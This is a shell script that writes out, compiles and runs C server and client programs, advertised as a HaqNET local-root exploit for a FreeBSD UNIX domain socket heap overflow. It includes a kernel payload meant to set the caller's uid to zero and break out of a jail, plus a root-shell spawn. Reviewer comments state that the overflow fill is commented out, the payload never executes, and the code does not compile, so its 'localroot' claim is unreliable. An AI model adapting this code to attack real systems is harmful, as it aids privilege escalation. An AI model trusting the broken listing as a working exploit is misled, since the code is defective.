- #!/bin/sh
# HaqNET "PROP3R localroot exploit" for the FreeBSD UNIX domain socket heap overflow.
# Derived from fbsd-uipc-heapx.sh, the original local DoS PoC by Shaun Colley <scolley@ioactive.com>, 29/09/11,
# for the FreeBSD UNIX domain sockets heap overflow.
# The original PoC was tested on FreeBSD 8.2-RELEASE and 7.3-RELEASE.
# See the advisory and patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
# NOTE(review): as pasted, the 0x61 fill is commented out (sun_path is an empty string), and
# kernelcode() is only memcpy'd to address 0, never executed. This listing therefore neither
# triggers the overflow nor escalates privileges; the "localroot" claim is not supported by the code below.
- # PoC will usually result in a kernel panic with a read access
- # violation at 0x616161XX but sometimes the kernel will not crash straight
- # away (particularly if you shorten the length of 'sun_path' -- try 140 bytes)
- # and your uid (see output of `id`) may have been modified to the
- # decimal equivalent of 0x61616161 during the heap smash
- ###############################################################################
################ Debug and change it as you like, but do NOT change the sun_path buffer size; it is set up deliberately.
################ With the 0x61 fill commented out below (sun_path is zero-filled), this should NOT DoS the local box.
################ Feedback? HaqNET.NET // SSL IRCD
- # server
- cat > srv.c << _EOF
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/un.h>
- #include <sys/types.h>
- #include <sys/event.h>
- #include <fcntl.h>
- #include <sys/param.h>
- #include <sys/linker.h>
- #include <sys/proc.h>
- #include <string.h>
- volatile int gotroot = 0;
/*
 * Intended in-kernel payload: locate the current thread via %fs:0, then zero
 * the uid and the prison pointer of its process credential ("jail break").
 *
 * NOTE(review): nothing in this listing executes this function. main() only
 * memcpy()s its bytes to address 0 and never maps page zero or redirects
 * kernel control flow there, so gotroot is never set and no credential is
 * modified. Treating %fs:0 as a kernel `struct thread *` only holds if the
 * code were actually running in kernel context on an x86 build that keeps
 * curthread there -- unverified here; in userland %fs:0 is the TLS base.
 * The td_proc/p_ucred field walk relies on the <sys/proc.h> layouts of the
 * exact kernel version.
 */
static void kernelcode(void) {
    struct thread *thread;
    gotroot = 1;                    /* flag polled by the child in main() */
    asm(
        "movl %%fs:0, %0"           /* read the pointer stored at %fs:0 */
        : "=r"(thread)
    );
    thread->td_proc->p_ucred->cr_uid = 0;       /* become uid 0 */
    thread->td_proc->p_ucred->cr_prison = NULL; /* jaillll break! */
    return;
}
/*
 * Empty marker: main() subtracts &kernelcode from this function's address to
 * size the memcpy() of the payload bytes. That only works if the compiler
 * keeps code_end directly after kernelcode, which it is not obliged to do.
 */
static void code_end(void) {
}
/*
 * Oversized stand-in for struct sockaddr_un: same position for the family,
 * but a 140-byte sun_path, larger than the system's sockaddr_un (the header
 * comment suggests tuning this length). bind()/connect() below pass
 * sizeof(struct socky) as the address length, presumably the overlong
 * namelen the referenced advisory is about.
 *
 * NOTE(review): FreeBSD's sockaddr_un starts with one-byte sun_len and
 * sun_family fields; a 16-bit sun_family here overlays both -- confirm the
 * kernel accepts this layout before relying on it.
 */
struct socky {
    short sun_family;     /* AF_UNIX is stored here by the callers */
    char sun_path[140];   /* deliberately longer than the real sun_path */
};
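/*
 * Serve one accepted connection: read a single message from the peer, print
 * it to stdout, and answer with a fixed banner.
 *
 * incoming: connected socket (any readable/writable descriptor works).
 * Returns 0 on success, -1 if the read or the reply write fails.
 *
 * Fixes vs. the original: the read() result was unchecked, so a -1 return
 * wrote the terminator at buffer[-1], and a full 256-byte read wrote it at
 * buffer[256], one past the end of the array. The descriptor is still left
 * open on purpose, as before.
 */
int connhandler(int incoming) {
    char buffer[256];
    static const char banner[] =
        "~ FreeBSD uIPC socket heap overflow explo1t - HaqNET ~";

    /* read at most sizeof-1 so the NUL terminator always fits */
    ssize_t n = read(incoming, buffer, sizeof buffer - 1);
    if (n < 0) {
        perror("read");
        return -1;
    }
    buffer[n] = '\0';
    printf("%s\n", buffer);

    /* sizeof banner - 1 is the banner's strlen: same bytes the original sent */
    ssize_t want = (ssize_t)(sizeof banner - 1);
    if (write(incoming, banner, (size_t)want) != want) {
        perror("write");
        return -1;
    }
    return 0;
}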
/*
 * Server side: bind a UNIX-domain listening socket using the oversized
 * `struct socky` address, then accept connections and fork a child per client.
 *
 * NOTE(review): as pasted this neither builds nor runs as advertised:
 *  - `i`, the child's loop counter, is never declared;
 *  - there is one closing brace too many after the final `return 0;`;
 *  - `alen` is passed to accept() uninitialised;
 *  - memcpy() to address 0 faults unless page zero is mapped, and nothing
 *    here maps it, so bind() is never reached;
 *  - the 0x61 fill is commented out, so sun_path is an empty string and no
 *    overlong path is ever submitted (had it been enabled, strcpy() of the
 *    159 non-NUL bytes of buf[160] into sun_path[140] would overrun the
 *    struct on the stack);
 *  - gotroot is only set inside kernelcode(), which never runs, so the child
 *    just waits out the loop and exec's /bin/sh with the caller's own uid
 *    (the setuid(0) result is unchecked and would fail for an unprivileged
 *    caller).
 */
int main(void) {
    struct socky overfl0w;
    int sock, incoming;
    socklen_t alen;             /* never initialised before accept() */
    pid_t child;
    char buf[160];              /* 160 > sizeof sun_path (140) */
    sock = socket(PF_UNIX, SOCK_STREAM, 0);
    if(sock < 0) {
        printf("socket fail\n");
        return 1;
    }
    memset(&overfl0w, 0, sizeof(struct socky));
    overfl0w.sun_family = AF_UNIX;
    //memset(buf, 0x61, sizeof(buf)); // 0x61 = crash c0de
    memset(buf, 0, sizeof(buf));     /* zero fill: sun_path ends up empty */
    buf[sizeof(buf)-1] = 0x00;
    strcpy(overfl0w.sun_path, buf);  /* copies just the terminating NUL */
    /* copy the payload bytes to the NULL page; function-pointer subtraction
     * is a GCC extension, and page zero is not mapped anywhere in this file */
    memcpy(0, &kernelcode, &code_end - &kernelcode);
    /* the whole oversized struct is passed as the address length */
    if(bind(sock, (struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
        printf("bind fail\n");
        return 1;
    }
    if(listen(sock, 5) != 0) {
        printf("listen fail\n");
        return 1;
    }
    while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1) {
        child = fork();
        if(child == 0) {
            /* poll gotroot for up to 4000 * 100us; `i` is undeclared here */
            while (!gotroot && i++ < 4000)
                usleep(100);
            setuid(0);                        /* result unchecked */
            execl("/bin/sh", "/bin/sh", NULL);
            return connhandler(incoming);     /* only reached if execl fails */
            //setuid(0);
            //execl("/bin/sh", "/bin/sh", NULL);
        }
        //close(incoming);                    /* parent never closes the client fd */
    }
    close(sock);
    return 0;
}
}  /* NOTE(review): unbalanced extra brace from the paste */
- _EOF
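# Build the server. Abort if compilation fails instead of falling through to
# ./srv with a stale or missing binary (the listing above does not compile as
# pasted: undeclared `i` and an extra closing brace in main()).
gcc srv.c -o srv || exit 1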
- #client
- cat > cli.c << _EOF
- #include <stdio.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/un.h>
- #include <string.h>
- #include <sys/linker.h>
- #include <sys/proc.h>
/*
 * Client-side copy of the oversized sockaddr_un stand-in used by srv.c:
 * family at the front, then a 140-byte sun_path. connect() below passes
 * sizeof(struct socky) as the address length.
 *
 * NOTE(review): FreeBSD's sockaddr_un begins with one-byte sun_len and
 * sun_family fields; the 16-bit sun_family here overlays both -- verify the
 * kernel accepts this layout.
 */
struct socky {
    short sun_family;     /* set to AF_UNIX in main() */
    char sun_path[140];   /* deliberately longer than the real sun_path */
};
/*
 * Client side: connect to the server's UNIX-domain socket using the
 * oversized `struct socky` address, send one message, print the reply.
 *
 * NOTE(review): defects visible in this listing:
 *  - `n` is passed to write() uninitialised because the snprintf() that set
 *    it is commented out, so an arbitrary length of uninitialised stack is
 *    (attempted to be) sent;
 *  - memset() zeroes only sizeof(struct sockaddr_un) bytes of the larger
 *    struct socky, yet the full sizeof(struct socky) is handed to connect(),
 *    so the tail of sun_path is uninitialised stack data;
 *  - the read() result is unchecked: a -1 writes buffer[-1], a full
 *    256-byte read writes buffer[256];
 *  - the 0x61 fill is commented out, so sun_path is an empty string and no
 *    overlong path is sent;
 *  - `i` is unused.
 */
int main(void) {
    int i;                              /* unused */
    struct socky overfl0w;
    int sock, n;                        /* n is used before being assigned */
    char buffer[256], buf[160];
    sock = socket(PF_UNIX, SOCK_STREAM, 0);
    if(sock < 0) {
        printf("socket fail\n");
        return 1;
    }
    /* zeroes the sockaddr_un-sized prefix only, not all of struct socky */
    memset(&overfl0w, 0, sizeof(struct sockaddr_un));
    overfl0w.sun_family = AF_UNIX;
    //memset(buf, 0x61, sizeof(buf)); // 0x61 = crash / local d0s
    memset(buf, 0, sizeof(buf));        /* zero fill: sun_path ends up empty */
    buf[sizeof(buf)-1] = 0x00;
    strcpy(overfl0w.sun_path, buf);     /* copies just the terminating NUL */
    //memcpy(0, &kernelcode, &code_end - &kernelcode);
    /* the whole oversized struct is passed as the address length */
    if(connect(sock,(struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
        printf("connect fail\n");
        return 1;
    }
    //n = snprintf(buffer, 256, "panic");
    write(sock, buffer, n);             /* n and buffer both uninitialised */
    n = read(sock, buffer, 256);        /* unchecked; may be -1 or 256 */
    buffer[n] = 0;                      /* out of bounds for n == -1 or 256 */
    printf("%s\n", buffer);
    //setuid(0);
    //execl("/bin/sh", "/bin/sh", NULL);
    //close(sock);
    return 0;
}
- _EOF
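# Build the client; abort on failure rather than running a stale binary.
gcc cli.c -o cli || exit 1
# NOTE(review): the client is launched before the server has had a chance to
# bind() and listen(), so its connect() likely races the server start-up and
# reports "connect fail"; the launch order is kept as the author wrote it.
./cli &
./srv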
- #if(!debug) {
- #printf("listen fail\n");
- #return 1;
- #}
- #id
- #whoami